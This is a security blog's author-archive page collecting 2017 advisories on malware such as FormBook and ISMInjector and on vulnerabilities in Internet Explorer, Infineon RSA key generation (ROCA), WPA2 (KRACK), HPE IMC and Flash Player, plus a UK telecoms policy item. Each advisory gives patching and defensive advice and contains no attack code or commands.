Author Archives: admin

FormBook Infostealer Malware

FormBook has grown in popularity recently and has been spotted as part of several malware distribution campaigns. It can be purchased for a relatively low price and is able to execute commands from its command and control (C2) server, enabling the attacker to execute files, start processes and steal passwords.

Another more notable feature of the kit, called the “Lagos Island method” by its creator, can disable user-mode hooking and Application Programming Interface (API) monitoring on the target systems.

The malware has been deployed through many files and methods, including malicious links in .pdf files, macro-enabled .doc files and archive files (such as .zip and .rar) containing .exe payloads.

Affected Platforms:

Microsoft Windows – all versions

Resolution :

  • Ensure users are aware of basic phishing practices (don’t click on attachments from senders you don’t recognise).
  • Maintain up-to-date anti-virus.
  • Be aware of files including PDF, DOC, XLS, ZIP, RAR, ACE, and ISO format attachments.
  • Monitor logs for indicators or compromise.





Microsoft Internet Explorer 9, 10 and 11 Multiple Flaws

Multiple vulnerabilities were reported in Microsoft Internet Explorer. A remote user can cause arbitrary code to be executed on the target user’s system. A remote user can obtain potentially sensitive information on the target system.

A remote user can create specially crafted content that, when loaded by the target user, will trigger an object memory handling error and execute arbitrary code on the target user’s system [CVE-2017-11822, CVE-2017-11813].

A remote user can create specially crafted content that, when loaded by the target user, will trigger an object memory handling error and access potentially sensitive information on the target user’s system [CVE-2017-11790].

A remote user can create specially crafted content that, when loaded by the target user, will trigger an object memory handling error and execute arbitrary code on the target user’s system [CVE-2017-11793, CVE-2017-11809, CVE-2017-11810]. This can also be exploited via an embedded ActiveX control marked “safe for initialization” in an application or Microsoft Office document that hosts the IE rendering engine.

Hui Gao of Palo Alto Networks, Heige (a.k.a. SuperHei) of Knownsec 404 Security Team, Jaanus Kp Clarified Security (via Trend Micros Zero Day Initiative), Dmitri Kaslov, Telspace Systems, Yixiang Zhu of National Engineering Lab for Mobile Internet System and Application Security, China, Lokihart of Google Project Zero, Ivan Fratric of Google Project Zero, and Atte Kettunen of F-Secure reported these vulnerabilities.

Impact:   A remote user can create content that, when loaded by the target user, will execute arbitrary code on the target user’s system.

A remote user can obtain potentially sensitive information on the target system.

Solution:   The vendor has issued a fix.

The Microsoft advisories are available at:

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11790
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11793
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11809
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11810
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11813
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11822





ISMInjector Trojan

ISMInjector is a trojan that injects malware into legitimate processes and has anti-analysis capabilities to avoid detection.

Currently a spear phishing campaign is used to deliver the trojan on a user’s system. The attackers send malicious .zip files that attempt to run in Microsoft Word. The macro in the Word documents will run a PowerShell command that will begin the process of installing ISMInjector via the CVE-2017-0199 vulnerability.

Affected Platforms:

  • Microsoft Office 2007 (SP3), 2010 (SP2), 2013 (SP1) and 2016
  • Microsoft Windows Vista SP2
  • Windows Server 2008 SP2
  • Windows 7 SP1
  • Windows 8

To prevent and detect a trojan infection, ensure that:

  • A robust program of education and awareness training is delivered to users to ensure they don’t open attachments or follow links within unsolicited emails.
  • All operating systems, antivirus and other security products are kept up to date.
  • All day to day computer activities such as email and internet are performed using non-administrative accounts.
  • Strong password policies are in place and password reuse is discouraged.
  • Network, proxy and firewall logs should be monitored for suspicious activity.
  • User accounts accessed from infected machines should be reset on a clean computer.


RSA Encryption Vulnerability – Practical Factorisation Attack

Flawed chipsets used by PCs to generate RSA encryption keys have a vulnerability which has weakened the security of stored passwords, encrypted disks and documents. The flaw has been found in cryptographic smartcards, security tokens, chipsets and secure hardware manufactured by Infineon Technologies. Their cryptographic chips and Trusted Platform Modules (TPMs) are also integrated within authentication, signature and encryption tokens of other vendors and chips.

The Return of the Coppersmith’s Attack (ROCA) vulnerability relates to the TPM used to cryptographically sign and protect computer systems and services. The flaw was discovered within the implementation of RSA keypair generation in a cryptographic library, allowing what is called a “practical factorisation” attack. This attack permits an attacker to use a target’s public key to generate a private key with some time and power. The attack is possible for common key lengths, including 1024 and 2048 bits.

Note that the RSA algorithms are not at fault, rather faulty products incorrectly implementing them and producing poorly randomised results.

Affected Platforms:

  • Infineon
  • Google
  • Lenovo
  • HP
  • Fujitsu
  • Microsoft
  • If not listed, check devices for NIST FIPS 140-2 or CC EAL 5+ certified hardware.

Resolution:

  • Users and administrators are encouraged to apply the necessary updates. HP, Google, Microsoft, Lenovo and Fujitsu have patches available.
  • Increase the key lengths to more than 2048 bit.
  • If a sensitive device cannot be patched, consider replacing the device.

Last week, Lenovo, MicrosoftGoogle, and Infineon each issued security bulletins regarding the weakness and warned customers to update their impacted systems.




Sophos UTM Up2Date 9.505 Released

Today Sophos have released Sophos UTM 9.505. The release will be rolled out in phases. In phase 1 you can download the update package from via the FTP server, in phase 2 Sophos will spread it via the Up2Date servers.

Up2Date Information

News

  • Security Release

Remarks

  • System will be rebooted
  • Connected APs will perform firmware upgrade
  • Connected REDs will perform firmware upgrade

Bugfixes

  • NUTM-8984 [RED] WPA2 KRACK vulnerability fixes for RED15w
  • NUTM-8789 [Wireless] WPA2 KRACK vulnerability fixes


 

Reforms To Boost UK’s Mobile Phone Infrastructure

People in areas of the UK with poor mobile coverage will soon get a significant boost to their connections thanks to Government action to speed up the rollout of mobile and broadband services.

Reforms made today to outdated legislation will reduce the costs of housing phone masts and other communications infrastructure on private land. This opens the way for faster and more reliable broadband and mobile services, particularly in rural areas.

Changes to the UK Electronic Communications Code will:

  • bring down the rents telecoms operators pay to landowners to install equipment to be more in line with utilities
  • providers, such as gas and water;
  • make it easier for operators to upgrade and share their equipment with other operators to help increase coverage;
  • make it easier for telecoms operators and landowners to resolve legal disputes.





Matt Hancock, Minister of State for Digital, said:

It’s not good enough that many people are struggling with poor mobile and broadband connections which is why we are improving coverage across the UK.

We want everyone to benefit from the growth of digital services. Removing these outdated restrictions will help promote investment in new technologies such as 5G, and give mobile operators more freedom to improve their networks in hard-to-reach places.

By the end of the year all mobile operators are required to deliver coverage to 90 per cent of the UK and 95 per cent of all homes and businesses will be able to get superfast broadband, but more needs to be done.

These reforms will help to drive investment and stimulate the continued growth, rollout and maintenance of communication technology infrastructure, an increasingly significant area of the UK’s economy.

Hamish MacLeod, Director of Mobile UK said:

The Electronic Communications Code is an important piece of the puzzle alongside further planning reform that will help mobile operators to overcome the challenges they face with expanding their networks, while also developing innovative services for customers.

Good mobile connectivity is no longer an optional extra. It is essential infrastructure as core to modern economic activity as broadband, electricity and other essential services.

Mark Talbot FRICS, Chair of the Royal Institute of Chartered (RICS) Surveyors Telecoms Forum Board, said:

RICS recognises the critical role that a modern, efficient and equitable digital infrastructure has on the future development of the UK economy. RICS has worked closely with our colleagues in DCMS to ensure that the new Code enables investment in our national digital infrastructure whilst balancing the needs of the public and private property owners.

With high speed internet seen by many as the fourth utility service the public and businesses expect access to digital services when they want and as they want, and RICS believes that the reformed Code is a great step forward towards this ultimate goal.

The old Electronic Communications Code was originally enacted in 1984, and became out-of-date as technology evolved, making it difficult for landowners and network operators to reach agreements and resolve disputes when rolling out modern digital infrastructure.

The Government reformed the Code through the Digital Economy Act, which received Royal Assent in April. The supporting regulations laid in Parliament today will bring the new Code into force, which is expected to take effect in December 2017. UK Electronic Communications Code




HPE Intelligent Management Center Service Operation Management Flaw

A vulnerability was reported in HPE Intelligent Management Center Service Operation Management. A remote user can obtain files on the target system.

A remote user can send a specially crafted request to download arbitrary files on the target system.

Tenable Inc. reported this vulnerability. Impact:   A remote user can obtain files on the target system.

Solution:   HPE has issued a fix (SOM 7.3 E0501P01).

RESOLUTION

HPE has made the following software updates to resolve the vulnerability in Intelligent Management Center Service Operation Management. The updates that address the vulnerability are in version 7.3 E0501P01.

  • iMC SOM – Version: Fixed in IMC SOM 7.3 E0501P01
    • HP Network Products
      • JG139A HPE IMC Service Operation Management Software Module License
      • JG139AAE HPE IMC Service Operation Management Software Module E-LTU

The HPE advisory is available at:

Vendor URL:  h20565.www2.hpe.com/hpsc/doc/public/display?docId=hpesbhf03776en_us

CVE Reference:   CVE-2017-12555





Oracle Issues Fix for Oracle Linux – KRACK WPA2 Hack

Multiple vulnerabilities were reported in wpa_supplicant. A remote user on the wireless network can access and modify data on the wireless network.

A remote user within range of the wireless network can record and replay retransmissions of part of the 802.11i 4-way handshake of the WPA and WPA2 protocols to force a reinstallation of the pairwise transient key, a group key, or an integrity key and force a reset of the incremental transmit packet number nonce and the receive replay counter. As a result, the remote user can replay encrypted packets, decrypt packets, and forge packets.

Both client systems and access points are affected.

A remote user on the wireless network can reinstall the pairwise encryption key (PTK-TK) [CVE-2017-13077].

A remote user on the wireless network can reinstall the group key (GTK) [CVE-2017-13078, CVE-2017-13080].

A remote user on the wireless network can reinstall the integrity group key (IGTK) [CVE-2017-13079, CVE-2017-13081].

A remote user on the wireless network can retransmit the Fast BSS Transition (FT) Reassociation Request and reinstall the pairwise encryption key (PTK-TK) [CVE-2017-13082].

A remote user on the wireless network can reinstall the Tunneled Direct-Link Setup (TDLS) PeerKey (TPK) key in the TDLS handshake [CVE-2017-13086].

A remote user on the wireless network can reinstall the group key (GTK) when processing a Wireless Network Management (WNM) Sleep Mode Response frame [CVE-2017-13087].

A remote user on the wireless network can reinstall the integrity group key (IGTK) when processing a Wireless Network Management (WNM) Sleep Mode Response frame [CVE-2017-13088].




This set of vulnerabilities is referred to as KRACK (Key Reinstallation AttaCK).

The original advisory is available at:

https://papers.mathyvanhoef.com/ccs2017.pdf

Additional information is available at:

https://www.krackattacks.com/

Mathy Vanhoef and Frank Piessens from Katholieke Universiteit Leuven reported these vulnerabilities. John Van Boxtel from Cypress reported one vulnerability.

[note: The vulnerabilities reside in the WPA and WPA2 protocol specification and are not due to incorrect vendor implementation of the standards.]

Impact:   A remote user on the wireless network can access and modify data on the wireless network.

Solution:   Oracle has issued a fix for CVE-2017-13077, CVE-2017-13078, CVE-2017-13079, CVE-2017-13080, CVE-2017-13081, CVE-2017-13082, and CVE-2017-13087.

The Oracle Linux advisory is available at:

http://linux.oracle.com/errata/ELSA-2017-2911.html

Vendor URL:  linux.oracle.com/errata/ELSA-2017-2911.html 




Red Hat Issues Fix KRACK WPA2 WiFi

Multiple vulnerabilities were reported in wpa_supplicant. A remote user on the wireless network can access and modify data on the wireless network.

A remote user within range of the wireless network can record and replay retransmissions of part of the 802.11i 4-way handshake of the WPA and WPA2 protocols to force a reinstallation of the pairwise transient key, a group key, or an integrity key and force a reset of the incremental transmit packet number nonce and the receive replay counter. As a result, the remote user can replay encrypted packets, decrypt packets, and forge packets – Details here

Both client systems and access points are affected.

A remote user on the wireless network can reinstall the pairwise encryption key (PTK-TK) [CVE-2017-13077].

A remote user on the wireless network can reinstall the group key (GTK) [CVE-2017-13078, CVE-2017-13080].

A remote user on the wireless network can reinstall the integrity group key (IGTK) [CVE-2017-13079, CVE-2017-13081].

A remote user on the wireless network can retransmit the Fast BSS Transition (FT) Reassociation Request and reinstall the pairwise encryption key (PTK-TK) [CVE-2017-13082].

A remote user on the wireless network can reinstall the Tunneled Direct-Link Setup (TDLS) PeerKey (TPK) key in the TDLS handshake [CVE-2017-13086].

A remote user on the wireless network can reinstall the group key (GTK) when processing a Wireless Network Management (WNM) Sleep Mode Response frame [CVE-2017-13087].

A remote user on the wireless network can reinstall the integrity group key (IGTK) when processing a Wireless Network Management (WNM) Sleep Mode Response frame [CVE-2017-13088].




This set of vulnerabilities is referred to as KRACK (Key Reinstallation AttaCK).

The original advisory is available at:

https://papers.mathyvanhoef.com/ccs2017.pdf

Additional information is available at:

https://www.krackattacks.com/

Mathy Vanhoef and Frank Piessens from Katholieke Universiteit Leuven reported these vulnerabilities. John Van Boxtel from Cypress reported one vulnerability.

[Editor’s note: The vulnerabilities reside in the WPA and WPA2 protocol specification and are not due to incorrect vendor implementation of the standards.]

Impact:   A remote user on the wireless network can access and modify data on the wireless network.

Solution:   Red Hat has issued a fix for CVE-2017-13077, CVE-2017-13078, CVE-2017-13080, and CVE-2017-13087.

The Red Hat advisory is available at:

https://access.redhat.com/errata/RHSA-2017:2911

Vendor URL:  access.redhat.com/errata/RHSA-2017:2911 (Links to External Site)

Cause:   Access control error, State error

Underlying OS:  Linux (Red Hat Enterprise)





Security Updates Available For Flash Player – APSB17-32

Adobe has released a security update for Adobe Flash Player for Windows, Macintosh, Linux and Chrome OS. This update addresses a critical type confusion vulnerability that could lead to code execution.

Adobe is aware of a report that an exploit for CVE-2017-11292 exists in the wild, and is being used in limited, targeted attacks against users running Windows.

Affected Product Versions

Adobe Flash Player Desktop Runtime – Version 27.0.0.159 – Windows, Macintosh

Adobe Flash Player for Google Chrome – Version 27.0.0.159 – Windows, Macintosh, Linux and Chrome OS

Adobe Flash Player for Microsoft Edge and Internet Explorer 11 Version – 27.0.0.130 – Windows 10 and 8.1

Adobe Flash Player Desktop Runtime – Version 27.0.0.159 – Linux

How To Update

  • Adobe recommends users of the Adobe Flash Player Desktop Runtime for Windows, Macintosh and Linux update to Adobe Flash Player 27.0.0.170 via the update mechanism within the product or by visiting the Adobe Flash Player Download Center.
  • Adobe Flash Player installed with Google Chrome will be automatically updated to the latest Google Chrome version, which will include Adobe Flash Player 27.0.0.170 for Windows, Macintosh, Linux and Chrome OS.
  • Adobe Flash Player installed with Microsoft Edge and Internet Explorer 11 for Windows 10 and 8.1 will be automatically updated to the latest version, which will include Adobe Flash Player 27.0.0.170.
  • Please visit the Flash Player Help page for assistance in installing Flash Player.

There is also the following updates from Microsoft – https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV170018

Users who have selected the option to ‘Allow Adobe to install updates’ will receive the update automatically. Users who do not have the ‘Allow Adobe to install updates’ option enabled can install the update via the update mechanism within the product when prompted.

How To Check Your Adobe Flash Version

To verify the version of Adobe Flash Player installed on your system, access the About Flash Player page, or right- click on content running in Flash Player and select “About Adobe (or Macromedia) Flash Player” from the menu. If you use multiple browsers, perform the check for each browser you have installed on your system.